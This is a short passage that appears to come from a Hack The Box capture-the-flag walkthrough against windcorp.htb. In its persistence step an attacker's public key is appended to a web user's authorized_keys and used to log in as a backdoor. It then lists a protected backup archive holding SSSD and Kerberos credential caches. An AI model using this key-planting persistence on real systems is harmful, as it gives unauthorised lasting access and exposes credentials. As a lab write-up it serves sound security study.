Enumeration
Persistence
ssh-keygen -t rsa -b 4096 -f backdoor_key -N ""webster@webserver:~/.ssh$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDLc/ZXDOsNZdE7fsCDzB57ib5lk91M/tpZDPQLBGqtg/uOW1lLKq68vJONu/nwTZRIxtymo1t9C4D17OH+3knB2tyavdN6puistzNsg6n8Cu8kftuBI3xCBKTfi5UlH+tJlENlSDMfTpUx7YDipjIpA1+MlIGom6moxFn03D8Vv8lDmOSZlt8e3Y4FPR3VRUbKS87E3UxAxtSweTi0Ts5zImtnud7oXkTetWbKifz6QkqosHJp3ovPu9Cg+FNu+/oU3Tjptb8ivG040LTPzVyeNEplwyPfLjsYlTBmLH1jRFWQTGBp4t5jC/z0X0TXYQBBglL4YAObitOqXQSPTVdypH60G44nLD0sTQFhYaLzLwQ/vY0ZNCiOazEjPXe0ZYOBVB72tUvyfIYyqd5rYlazJiVwxUHZjo96Vg3HbubMD3Tk9cDUwsh/F53Egzn4meY+LGcIiPQmmtnhgIF4/PvNdjScMmo7x6GJfcv3ua5D8elotZODLSIEbNGRJwzm9BGb3Y1MTJboIsRBXpgSAmFZ4IOO9ldo0nq0PgB8wJPSy8asPxucsc4tAHtxArqQQswcnUiu/YgBIVCG8ekAPik0l30pfIrSI8XCf83qEfc4gdMGl7aA6M5rbXfL1HZZt4sXayJPNz7wv2KjSAUoZzZzM7RcgKZgIDl//VmT8tm0vw== anonmak9@anonmak9' >> ~/.ssh/authorized_keyschmod 700 ~/.ssh
chmod 600 ~/.ssh/authorized_keysssh -i backdoor_key [email protected]Moving On
unzip backup.zip
Archive: backup.zip
[backup.zip] etc/passwd password: unzip -l backup.zip
Archive: backup.zip
Length Date Time Name
--------- ---------- ----- ----
1509 2022-04-30 10:27 etc/passwd
0 2021-02-10 05:49 etc/sssd/conf.d/
411 2022-04-29 07:39 etc/sssd/sssd.conf
0 2022-07-28 06:31 var/lib/sss/db/
1286144 2022-07-28 06:24 var/lib/sss/db/timestamps_windcorp.htb.ldb
1286144 2022-07-28 06:16 var/lib/sss/db/config.ldb
0 2022-07-28 06:16 var/lib/sss/db/test/
1286144 2022-07-28 06:01 var/lib/sss/db/test/timestamps_windcorp.htb.ldb
1286144 2022-07-28 06:04 var/lib/sss/db/test/config.ldb
1286144 2022-07-28 06:12 var/lib/sss/db/test/cache_windcorp.htb.ldb
1286144 2022-04-30 11:51 var/lib/sss/db/test/sssd.ldb
4016 2022-07-28 06:04 var/lib/sss/db/test/ccache_WINDCORP.HTB
1609728 2022-07-28 06:38 var/lib/sss/db/cache_windcorp.htb.ldb
1286144 2022-07-28 06:16 var/lib/sss/db/sssd.ldb
2708 2022-07-28 06:31 var/lib/sss/db/ccache_WINDCORP.HTB
0 2021-02-10 05:49 var/lib/sss/deskprofile/
0 2022-04-29 07:45 var/lib/sss/gpo_cache/
0 2022-04-29 07:45 var/lib/sss/gpo_cache/windcorp.htb/
0 2022-04-29 07:45 var/lib/sss/gpo_cache/windcorp.htb/Policies/
0 2022-07-28 06:24 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/
0 2022-04-29 07:45 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/
0 2022-04-29 07:45 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/
0 2022-04-29 07:45 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/
0 2022-07-28 06:23 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/SecEdit/
2568 2022-07-28 06:23 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/SecEdit/GptTmpl.inf
23 2022-07-28 06:24 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
0 2021-02-10 05:49 var/lib/sss/keytabs/
0 2022-07-28 06:16 var/lib/sss/mc/
9253600 2022-07-28 06:24 var/lib/sss/mc/passwd
6940392 2022-07-28 06:16 var/lib/sss/mc/group
11567160 2022-07-28 06:23 var/lib/sss/mc/initgroups
0 2022-07-28 06:16 var/lib/sss/pipes/
0 2022-07-28 06:16 var/lib/sss/pipes/private/
0 2022-07-28 06:31 var/lib/sss/pubconf/
12 2022-07-28 06:31 var/lib/sss/pubconf/kdcinfo.WINDCORP.HTB
0 2022-07-28 06:16 var/lib/sss/pubconf/krb5.include.d/
40 2022-07-28 06:16 var/lib/sss/pubconf/krb5.include.d/krb5_libdefaults
113 2022-07-28 06:16 var/lib/sss/pubconf/krb5.include.d/localauth_plugin
15 2022-07-28 06:16 var/lib/sss/pubconf/krb5.include.d/domain_realm_windcorp_htb
0 2021-02-10 05:49 var/lib/sss/secrets/
--------- -------
38385303 40 files
Last updated